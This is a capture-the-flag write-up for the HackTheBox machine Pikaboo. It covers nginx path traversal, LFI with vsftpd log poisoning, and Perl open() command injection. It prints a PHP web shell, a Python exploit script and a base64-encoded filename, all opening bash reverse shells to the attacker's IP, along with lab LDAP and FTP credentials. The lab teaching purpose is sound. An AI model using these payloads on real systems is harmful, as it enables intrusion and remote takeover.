<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Hackthebox - Pikaboo" /><meta property="og:locale" content="en" /><meta name="description" content="Just another hackthebox writeups website powered by poorduck" /><meta property="og:description" content="Just another hackthebox writeups website powered by poorduck" /><link rel="canonical" href="https://x00tex.github.io/posts/pikaboo/" /><meta property="og:url" content="https://x00tex.github.io/posts/pikaboo/" /><meta property="og:site_name" content="Poorduck" /><meta property="og:image" content="https://x00tex.github.io/assets/img/posts/pikaboo/pikaboo_banner.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-12-10T18:30:00+00:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://x00tex.github.io/assets/img/posts/pikaboo/pikaboo_banner.png" /><meta property="twitter:title" content="Hackthebox - Pikaboo" /><meta name="twitter:site" content="@p00rduck" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2021-12-10T18:30:00+00:00","datePublished":"2021-12-10T18:30:00+00:00","description":"Just another hackthebox writeups website powered by poorduck","headline":"Hackthebox - Pikaboo","image":"https://x00tex.github.io/assets/img/posts/pikaboo/pikaboo_banner.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://x00tex.github.io/posts/pikaboo/"},"url":"https://x00tex.github.io/posts/pikaboo/"}</script><title>Hackthebox - Pikaboo | Poorduck</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Poorduck"><meta name="application-name" content="Poorduck"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/poorduck.png " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Poorduck</a></div><div class="site-subtitle font-italic">Kwak kwak</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/x00tex" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/p00rduck" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['x00tex-writeups.3us6n','simplelogin.co'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Hackthebox - Pikaboo</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hackthebox - Pikaboo</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/p00rduck">p00rduck</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1639161000" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2021-12-10 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="915 words"> <em>5 min</em> read</span></div></div></div><div class="post-content"><p><img data-src="/assets/img/posts/pikaboo/pikaboo_banner.png" alt="" data-proofer-ignore></p><p align="right"> <a href="https://www.hackthebox.eu/home/users/profile/391067" target="_blank"><img loading="lazy" alt="x00tex" data-src="https://www.hackthebox.eu/badge/image/391067" data-proofer-ignore></a></p><h1 id="enumeration">Enumeration</h1><p><strong>IP-ADDR:</strong> 10.10.10.249 pikaboo.htb</p><p><strong>nmap scan:</strong></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f <span class="o">(</span>RSA<span class="o">)</span>
|   256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p>web server home page have <code class="language-plaintext highlighter-rouge">/admin</code></p><p><img data-src="/assets/img/posts/pikaboo/home-page.png" alt="" data-proofer-ignore></p><h1 id="foothold">Foothold</h1><p>From web server’s DIRECTORY TRAVERSAL to LFI to RCE.</p><h2 id="url-parser-logicdirectory-traversal-in-nginx"><span class="mr-2">URL parser logic(directory traversal) in nginx</span><a href="#url-parser-logicdirectory-traversal-in-nginx" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><code class="language-plaintext highlighter-rouge">/admin</code> uses http basic authentication but the error looks intresting</p><p><img data-src="/assets/img/posts/pikaboo/admin-on-81.png" alt="" data-proofer-ignore></p><p>nginx server is running reverse proxy to local apache server.</p><ul><li>A good blog on Nginx misconfigurations issues: https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/</ul><p>There is a url parser logic bug in misconfigured nignx config file.</p><p><img data-src="/assets/img/posts/pikaboo/url-parser.png" alt="" data-proofer-ignore></p><ul><li>This bug also covered in the <a href="https://github.com/x00tex/hackTheBox/blob/main/Boxes/linux/Retired/seal/README.md#server-url-parser-logic">Hackthebox: seal</a></ul><p>Orange Tsai presentation</p><ul><li>https://www.youtube.com/watch?v=CIhHpkybYsY<li>https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf</ul><p>gobuster found something interesting</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>❯ gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.10.10.249/admin../ <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt <span class="nt">-t</span> 100

<span class="c"># ... [snip] ...</span>

/admin                <span class="o">(</span>Status: 401<span class="o">)</span> <span class="o">[</span>Size: 456]
/javascript           <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 314] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://127.0.0.1:81/javascript/]
/server-status        <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 4339]
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">/javascript</code> return 403 Forbidden</p><p>we have access to <code class="language-plaintext highlighter-rouge">/server-status</code>, this will give us some interesting insight information</p><p><img data-src="/assets/img/posts/pikaboo/server-status.png" alt="" data-proofer-ignore></p><p>Found a new directory form <code class="language-plaintext highlighter-rouge">/server-status</code></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>/admin_staging
</pre></table></code></div></div><p><img data-src="/assets/img/posts/pikaboo/admin-staging.png" alt="" data-proofer-ignore></p><p>There are some pages in this directory and application loading them from a parameter</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://10.10.10.249/admin../admin_staging/index.php?page<span class="o">=</span>user.php
</pre></table></code></div></div><p><img data-src="/assets/img/posts/pikaboo/lfi-sus.png" alt="" data-proofer-ignore></p><h2 id="lfi"><span class="mr-2">lfi</span><a href="#lfi" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>This parameter could lead to lfi vulnerability.</p><p>on first glance it looks like that there is no lfi vulnerability but running multiple lfi fuzzing list from seclists only get these 4 files</p><p><img data-src="/assets/img/posts/pikaboo/lfi-files.png" alt="" data-proofer-ignore></p><p>Looks file application can’t escape <code class="language-plaintext highlighter-rouge">/var</code> directory.</p><h3 id="lfi-to-rce-via-ftp-log"><span class="mr-2">lfi to RCE via ftp log</span><a href="#lfi-to-rce-via-ftp-log" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>one file that could help us to get reverse shell is <code class="language-plaintext highlighter-rouge">/var/log/vsftpd.log</code></p><p>From nmap scan, ftp service is listening on port 21</p><p>FTP server logs are stored in <code class="language-plaintext highlighter-rouge">/var/log/vsftpd.log</code>. If you have a LFI and can access a exposed vsftpd server, you could try to login <strong>setting the PHP payload in the username and then access the logs using the LFI.</strong></p><p>use php code as username</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="s1">'&lt;?php phpinfo(); ?&gt;'</span>
</pre></table></code></div></div><p><img data-src="/assets/img/posts/pikaboo/lfi-to-rce.png" alt="" data-proofer-ignore></p><p>add php web shell in ftp log file and execute it with lfi.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="s1">'&lt;?php system($_GET['</span>c<span class="s1">']); ?&gt;'</span>
</pre></table></code></div></div><p>request parameter <code class="language-plaintext highlighter-rouge">c</code> and send url encoded bash reverse shell with it.</p><p><img data-src="/assets/img/posts/pikaboo/rev-shell.png" alt="" data-proofer-ignore></p><p>Python script to automate the exploit</p><div class="language-py highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">ftplib</span>
<span class="kn">import</span> <span class="nn">requests</span> <span class="k">as</span> <span class="n">r</span>

<span class="n">lhost</span> <span class="o">=</span> <span class="s">'10.10.14.42'</span> <span class="c1">#changeme
</span><span class="n">lport</span> <span class="o">=</span> <span class="s">'4141'</span> <span class="c1">#changeme
# payload = """'&lt;?php system($_GET['c']); ?&gt;'"""
</span><span class="n">payload</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"""'&lt;?php exec("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/</span><span class="si">{</span><span class="n">lhost</span><span class="si">}</span><span class="s">/</span><span class="si">{</span><span class="n">lport</span><span class="si">}</span><span class="s"> 0&gt;&amp;1'"); ?&gt;'"""</span>
<span class="n">server</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">()</span>
<span class="k">try</span><span class="p">:</span>
    <span class="n">server</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">'10.10.10.249'</span><span class="p">,</span> <span class="mi">21</span><span class="p">)</span>
    <span class="n">server</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="s">''</span><span class="p">)</span>
<span class="k">except</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">all_errors</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">KeyboardInterrupt</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="nb">exit</span><span class="p">(</span><span class="s">'KeyboardInterrupt'</span><span class="p">)</span>

<span class="n">lfi_url</span> <span class="o">=</span> <span class="sa">f</span><span class="s">'http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log'</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">rspn</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">lfi_url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span>
    <span class="c1"># print(rspn.text)
</span><span class="k">except</span> <span class="n">r</span><span class="p">.</span><span class="n">exceptions</span><span class="p">.</span><span class="n">Timeout</span><span class="p">:</span>
    <span class="nb">exit</span><span class="p">(</span><span class="s">'Request timeout'</span><span class="p">)</span>
<span class="k">except</span> <span class="n">r</span><span class="p">.</span><span class="n">exceptions</span><span class="p">.</span><span class="n">RequestException</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="nb">exit</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">KeyboardInterrupt</span><span class="p">:</span>
    <span class="nb">exit</span><span class="p">(</span><span class="s">'KeyboardInterrupt'</span><span class="p">)</span>
</pre></table></code></div></div><p><img data-src="/assets/img/posts/pikaboo/user-flag.png" alt="" data-proofer-ignore></p><h1 id="privesc">Privesc</h1><p>From linpeas script, found some interesting information</p><p>There is a crontab running every minute</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> root /usr/local/bin/csvupdate_cron
</pre></table></code></div></div><p>ldap database server running in localhost</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>State     Recv-Q    Send-Q       Local Address:Port       Peer Address:Port
LISTEN    0         128              127.0.0.1:389             0.0.0.0:<span class="k">*</span>
</pre></table></code></div></div><p>And ldap server password from PokeAPI config <code class="language-plaintext highlighter-rouge">/opt/pokeapi/config/setting.py</code></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="s2">"ldap"</span>: <span class="o">{</span>
        <span class="s2">"ENGINE"</span>: <span class="s2">"ldapdb.backends.ldap"</span>,
        <span class="s2">"NAME"</span>: <span class="s2">"ldap:///"</span>,
        <span class="s2">"USER"</span>: <span class="s2">"cn=binduser,ou=users,dc=pikaboo,dc=htb"</span>,
        <span class="s2">"PASSWORD"</span>: <span class="s2">"J~42%W?PFHl]g"</span>,
    <span class="o">}</span>,
</pre></table></code></div></div><h2 id="perl-command-injection"><span class="mr-2">perl command injection</span><a href="#perl-command-injection" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Crontab is running a bash script which executing <code class="language-plaintext highlighter-rouge">/usr/local/bin/csvupdate</code> in ftp directory every minute as root</p><p><img data-src="/assets/img/posts/pikaboo/csv-cron-job.png" alt="" data-proofer-ignore></p><p>And <code class="language-plaintext highlighter-rouge">/usr/local/bin/csvupdate</code> is a perl script.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@pikaboo.htb:/var/www<span class="nv">$ </span>file /usr/local/bin/csvupdate
/usr/local/bin/csvupdate: Perl script text executable
</pre></table></code></div></div><p>Script banner say that this script is part of the PokeAPI and taking <code class="language-plaintext highlighter-rouge">.csv</code> files from ftp home directory.</p><p><img data-src="/assets/img/posts/pikaboo/perl-script-pokeapi.png" alt="" data-proofer-ignore></p><p>This script is using <code class="language-plaintext highlighter-rouge">open()</code> function to read files from ftp directory</p><div class="language-perl highlighter-rouge"><div class="code-header"> <span data-label-text="Perl"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="c1"># ... [snip] ...</span>
<span class="k">my</span> <span class="nv">$fname</span> <span class="o">=</span> <span class="p">"</span><span class="si">${csv_dir}</span><span class="s2">/</span><span class="si">${type}</span><span class="s2">.csv</span><span class="p">";</span>
<span class="nb">open</span><span class="p">(</span><span class="k">my</span> <span class="nv">$fh</span><span class="p">,</span> <span class="p">"</span><span class="s2">&gt;&gt;</span><span class="p">",</span> <span class="nv">$fname</span><span class="p">)</span> <span class="ow">or</span> <span class="nb">die</span> <span class="p">"</span><span class="s2">Unable to open CSV target file.</span><span class="se">\n</span><span class="p">";</span>
<span class="c1"># ... [snip] ...</span>
</pre></table></code></div></div><p>And there is a command injection bug in the perl’s <code class="language-plaintext highlighter-rouge">open()</code> function</p><ul><li>From this research paper: https://research.cs.wisc.edu/mist/SoftwareSecurityCourse/Chapters/3_8_2-Command-Injections.pdf<li><p>Talk “Netanel Rubin: The Perl Jam 2”: https://www.youtube.com/watch?v=RPvORV2Amic</p><p>Even if you do not intend to execute a command line in a shell it can happen as a side effect of using what looks like an innocuous library. For example, consider the Perl open function: <code class="language-plaintext highlighter-rouge">open(F, $filename)</code></p><p><strong>Depending on the syntax of the string ​<code class="language-plaintext highlighter-rouge">$filename​</code> this can open files in various modes, start programs, run commands, or duplicate file descriptors. For example, if ​<code class="language-plaintext highlighter-rouge">$filename​</code> is “​<code class="language-plaintext highlighter-rouge">rm -rf /|​</code>”, it will execute the rm command in a shell and delete the file system root (if privileges allow).</strong></p></ul><p>So, if we use a command as filename and save it in the ftp directory, That <code class="language-plaintext highlighter-rouge">/usr/local/bin/csvupdate</code> script could execute that command.</p><p>Second Thing is that, if we need ftp creds for accessing the server so do the PokeAPI and it’s config file only contains ldap database creds.</p><p>We know the ldap creds from <code class="language-plaintext highlighter-rouge">/opt/pokeapi/config/setting.py</code></p><p>Got commnad for extract data from <a href="https://book.hacktricks.xyz/pentesting/pentesting-ldap#manual-1">hacktricks</a></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ldapsearch <span class="nt">-x</span> <span class="nt">-h</span> &lt;IP&gt; <span class="nt">-D</span> <span class="s1">'&lt;DOMAIN&gt;\&lt;username&gt;'</span> <span class="nt">-w</span> <span class="s1">'&lt;password&gt;'</span> <span class="nt">-b</span> <span class="s2">"DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TDL&gt;"</span>
</pre></table></code></div></div><p>Get data from ftp domain</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ldapsearch <span class="nt">-x</span> <span class="nt">-h</span> 127.0.0.1 <span class="nt">-D</span> <span class="s1">'cn=binduser,ou=users,dc=pikaboo,dc=htb'</span> <span class="nt">-w</span> <span class="s1">'J~42%W?PFHl]g'</span> <span class="nt">-b</span> <span class="s1">'dc=ftp,dc=pikaboo,dc=htb'</span>
</pre></table></code></div></div><p><img data-src="/assets/img/posts/pikaboo/ldap-dump.png" alt="" data-proofer-ignore></p><p>ftp user creds: <code class="language-plaintext highlighter-rouge">pwnmeow:_G0tT4_C4tcH_'3m_4lL!_</code></p><p>Create a file with reverse shell as it’s name in the local direcotry.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>❯ <span class="nb">echo</span> <span class="s1">'bash  -i  &gt;&amp;  /dev/tcp/10.10.14.44/4141  0&gt;&amp;1  '</span> | <span class="nb">base64</span> <span class="nt">-w</span> 0
YmFzaCAgLWkgID4mICAvZGV2L3RjcC8xMC4xMC4xNC40NC80MTQxICAwPiYxICAK
❯ <span class="nb">touch</span> <span class="nt">--</span> <span class="s1">'|echo YmFzaCAgLWkgID4mICAvZGV2L3RjcC8xMC4xMC4xNC40NC80MTQxICAwPiYxICAK|base64 -d|bash;.csv'</span>
❯ <span class="nb">ls</span>
<span class="s1">'|echo YmFzaCAgLWkgID4mICAvZGV2L3RjcC8xMC4xMC4xNC40NC80MTQxICAwPiYxICAK|base64 -d|bash;.csv'</span>
</pre></table></code></div></div><p>Use <code class="language-plaintext highlighter-rouge">mput *</code> to upload file. User “pwnmeow” don’t have permission to write in ftp root directory but there are bunch of sub directory where we can write.</p><p>after uploading file run netcat listener.</p><p><img data-src="/assets/img/posts/pikaboo/rooted.png" alt="" data-proofer-ignore></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a>, <a href='/categories/linux/'>linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/nginx/" class="post-tag no-text-decoration" >nginx</a> <a href="/tags/url-parser-logic/" class="post-tag no-text-decoration" >url parser logic</a> <a href="/tags/lfi/" class="post-tag no-text-decoration" >lfi</a> <a href="/tags/perl-command-injection/" class="post-tag no-text-decoration" >perl command injection</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hackthebox - Pikaboo - Poorduck&amp;url=https://x00tex.github.io/posts/pikaboo/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hackthebox - Pikaboo - Poorduck&amp;u=https://x00tex.github.io/posts/pikaboo/" data-toggle="tooltip" data-placement="top" title="Facebook" 